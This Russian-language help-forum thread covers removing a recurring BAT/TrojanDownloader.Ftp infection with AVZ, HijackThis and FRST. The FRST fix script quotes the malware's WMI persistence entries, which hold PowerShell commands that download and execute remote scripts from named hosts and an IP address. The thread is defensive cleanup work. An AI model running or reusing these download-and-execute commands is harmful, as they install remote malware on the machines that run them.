Решена BAT/TrojanDownloader.Ftp что это и как удалить с компьютера

Статус
В этой теме нельзя размещать новые ответы.

needinfinity

Новый пользователь
Сообщения
18
Реакции
0
ESET Online Scaner обнаружил 2 файла BAT/TrojanDownloader.Ftp Windows/System32/p и Windows/System32/ps
После того как утилита удаляет эти файлы, они снова появляются. Помогите как это удалить..
 

Вложения

ESET последний раз сканировал вчера, нашел снова эти файлы и удалил. Возможно, в логах вирусов не найдется т.к они еще не появились. ( я не разбираюсь в этом )
 
На какие файлы ругается антивирус?

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ из папки Autologger (Файл - Выполнить скрипт):
Код:
  begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
  SearchRootkit(true, true);
  SetAVZGuardStatus(True);
  end;
 QuarantineFile('C:\Programdata\RealtekHD\taskhostw.exe','');
 QuarantineFile('C:\Programdata\RealtekHD\taskhost.exe','');
 DeleteFile('C:\Programdata\RealtekHD\taskhost.exe','64');
 DeleteFile('C:\Programdata\RealtekHD\taskhostw.exe','64');
 DeleteSchedulerTask('Microsoft\Windows\Wininet\RealtekHDControl');
 DeleteSchedulerTask('Microsoft\Windows\Wininet\RealtekHDStartUP');
 DeleteSchedulerTask('Microsoft\Windows\Wininet\Taskhost');
 DeleteSchedulerTask('Microsoft\Windows\Wininet\Taskhostw');
ClearHostsFile;
   BC_Activate;
  ExecuteSysClean;
  ExecuteWizard('SCU', 2, 3, true);
 BC_ImportALL;
RebootWindows(true);
end.
Компьютер перезагрузится.

После перезагрузки, выполните такой скрипт:

Код:
begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
end.

Файл quarantine.7z из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма.

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код:
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{166EB408-AB10-4916-AB2F-5E77325D328C} - \Yandex.Stroka.User.S-1-5-21-306002614-2138405325-3491090883-1001 (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5EE0BE42-EA97-43EE-96C6-1E10C0C11379} - \AdobeUpdateFlac (no xml)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{ED1EC8AF-9A69-4F37-AA13-FD18513E09C7} - \AdobeUpdateFlac2 (no xml)

Для повторной диагностики запустите снова AutoLogger. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift".
 
появился архив quarantine.7z с пустой папкой, все равно отправить этот файл? Строки пофиксил.
На какие файлы ругается антивирус? Этого я не понял, прошел быстро процесс через первый скрипт и компьютер перезагрузился. Во время второго скрипта тоже ничего не было.

После повторной диагностики
 

Вложения

Последнее редактирование:
У меня на компьютере не установлен антивирус. Или мне снова запустить сканирование ESET?
 
нет, запускать не нужно. Можно посмотреть так (пункт 11 или 15).

Если не получилось, то не стоит тратить свое время.


++++
Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да (Yes) для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 
Все таки не получилось открыть журнал. У меня обычная версия ESET scanner и я могу открыть журнал, в котором инфа только об последнем сканировании ( который я делал сегодня, но отменил его ). А чтобы открыть открыть инфу о прошлых сканированиях нужна полная версия ESET Internet Security. Но опять таки, возможно я не правильно понял :)).

Файлы после сканирования:
 

Вложения

Дополнительно, пожалуйста:
Скачайте AV block remover.
Распакуйте, запустите и следуйте инструкциям. Если не запускается, переименуйте файл AVbr.exe в, например, AV_br.exe
В результате работы утилиты появится отчёт AV_block_remove_дата-время.log, прикрепите его к следующему сообщению.

После перезагрузки системы удалите старые и соберите новые логи FRST.txt и Addition.txt
 
  • Like
Реакции: akok
Примите к сведению - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены.
  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Код:
    Start::
    SystemRestore: On
    CreateRestorePoint:
    LM-x32\...\Run: [] => [X]
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
    GroupPolicy: Ограничение ? <==== ВНИМАНИЕ
    GroupPolicy\User: Ограничение ? <==== ВНИМАНИЕ
    Policies: C:\ProgramData\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
    WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"bacru4\"",Filter="__EventFilter.Name=\"bacru3\"::
    WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"tosa4\"",Filter="__EventFilter.Name=\"tosa3\"::
    WMI:subscription\__EventFilter->bacru3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
    WMI:subscription\__EventFilter->tosa3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10500 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
    WMI:subscription\CommandLineEventConsumer->bacru4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.oopmus.ru:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://bec.rocop.ru:8221/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://oo (запись имеет ещё 358 символов).]
    WMI:subscription\CommandLineEventConsumer->tosa4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.webpublicservices.org:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://185.26.113.95:8221/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadStri (запись имеет ещё 410 символов).]
    AlternateDataStreams: C:\Users\Максим\Application Data:bc6be3eabffaddc099151eee7bdd94ee [394]
    AlternateDataStreams: C:\Users\Максим\AppData\Roaming:bc6be3eabffaddc099151eee7bdd94ee [394]
    FirewallRules: [{F35952D5-BA27-4D6B-B87C-6D0A00A0988F}] => (Allow) C:\Users\Максим\AppData\Roaming\DRPSu\Alice\cloud.exe => Нет файла
    FirewallRules: [{B9B739E6-6226-4B5D-B16C-341F669768C3}] => (Allow) C:\Users\Максим\AppData\Roaming\DRPSu\Alice\cloud.exe => Нет файла
    FirewallRules: [{86C62C5E-175D-43BE-9EA3-3C3E73D76F1F}] => (Allow) C:\Users\Максим\AppData\Roaming\DRPSu\Alice\cloud.exe => Нет файла
    FirewallRules: [{9F446B59-B091-4B78-B4F4-CCC22C82D184}] => (Allow) C:\Users\Максим\AppData\Roaming\DRPSu\Alice\cloud.exe => Нет файла
    FirewallRules: [{9F645E99-E060-46C7-8350-E8C904A3BCE8}] => (Allow) C:\Users\Максим\AppData\Roaming\DRPSu\Alice\cloud.exe => Нет файла
    FirewallRules: [{9C4FB3C7-85AC-4E5E-9B8F-E824CC462E90}] => (Allow) C:\Users\Максим\AppData\Roaming\DRPSu\Alice\cloud.exe => Нет файла
    FirewallRules: [{2F6740C3-703C-45DA-9F40-0F2B48BD3065}] => (Allow) C:\Users\Максим\AppData\Roaming\uTorrent\uTorrent.exe => Нет файла
    FirewallRules: [{B1CD9C05-4567-4A48-BB3B-4AB8295F983A}] => (Allow) C:\Users\Максим\AppData\Roaming\uTorrent\uTorrent.exe => Нет файла
    FirewallRules: [TCP Query User{56D8F0F0-7147-4F94-9D2C-B8866688389C}C:\program files (x86)\origin games\fifa 20\fifa20.exe] => (Allow) C:\program files (x86)\origin games\fifa 20\fifa20.exe => Нет файла
    FirewallRules: [UDP Query User{9F4E707D-0286-4A95-A604-45F1A819BF77}C:\program files (x86)\origin games\fifa 20\fifa20.exe] => (Allow) C:\program files (x86)\origin games\fifa 20\fifa20.exe => Нет файла
    FirewallRules: [TCP Query User{E4BBD57B-5DF7-47C5-B0B4-5248A4067C60}C:\program files (x86)\windscribe\wsappcontrol.exe] => (Allow) C:\program files (x86)\windscribe\wsappcontrol.exe => Нет файла
    FirewallRules: [UDP Query User{1C41EFF1-2FD7-4B9F-87B6-099592C5CC71}C:\program files (x86)\windscribe\wsappcontrol.exe] => (Allow) C:\program files (x86)\windscribe\wsappcontrol.exe => Нет файл
    FirewallRules: [{1AC48C3D-088A-4392-9F8C-9DB7B4593B05}] => (Allow) C:\Users\Максим\AppData\Local\Programs\Opera\77.0.4054.277\opera.exe => Нет файла
    FirewallRules: [TCP Query User{45227272-F8F9-4759-A647-8B369A27859C}C:\farming simulator 22\x64\farmingsimulator2022game.exe] => (Allow) C:\farming simulator 22\x64\farmingsimulator2022game.exe => Нет файла
    FirewallRules: [UDP Query User{1F1A45B7-B104-4D00-8861-96B4BCEE898F}C:\farming simulator 22\x64\farmingsimulator2022game.exe] => (Allow) C:\farming simulator 22\x64\farmingsimulator2022game.exe => Нет файла
    FirewallRules: [TCP Query User{D4327131-BEB0-4B65-8FA2-20ACBC647410}C:\users\максим\downloads\core keeper\corekeeper.exe] => (Allow) C:\users\максим\downloads\core keeper\corekeeper.exe => Нет файла
    FirewallRules: [UDP Query User{8E2C46A4-4FA3-4857-95AC-34BF9AFBA84D}C:\users\максим\downloads\core keeper\corekeeper.exe] => (Allow) C:\users\максим\downloads\core keeper\corekeeper.exe => Нет файла
    FirewallRules: [TCP Query User{040D8804-3BF7-4B1B-89E1-CBDD555830BD}C:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) C:\program files (x86)\hearthstone\hearthstone.exe => Нет файла
    FirewallRules: [UDP Query User{DC104657-157C-473E-B89B-C6850D7B1DF4}C:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) C:\program files (x86)\hearthstone\hearthstone.exe => Нет файла
    FirewallRules: [{D9123B32-772D-449F-8812-9455CC19889A}] => (Allow) C:\Users\Максим\AppData\Local\Programs\Opera\85.0.4341.60\opera.exe => Нет файла
    FirewallRules: [{8b3fac1e-d21f-462a-bfc9-da2491a453c8}] => (Allow) C:\Program Files\ldplayerbox\LdVBoxHeadless.exe => Нет файла
    FirewallRules: [{1633F955-73F1-46E4-9DD1-0F5497C2E2F0}] => (Allow) C:\Program Files (x86)\Bignox\BigNoxVM\RT\NoxVMHandle.exe => Нет файла
    EmptyTemp:
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.
 
Если что, я случайно в первый раз нажал fix до того как создал файл со скриптом и сразу прервал процесс.
 

Вложения

Файл со скриптом и не нужно было создавать :)
1652354719796.webp


Что сейчас с проблемой?
 
Сейчас я не могу ответить. Просканировать ESET заново, что бы получить ответ? :)
 
Да, пожалуйста.
 
Сделайте новое сканирование FRST. Мы удалили ту часть вредоноса, что распространяла заразу +++ когда будете запускать сканирование поставьте галочку напротив "показывать файлы за 90 дней".
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху Снизу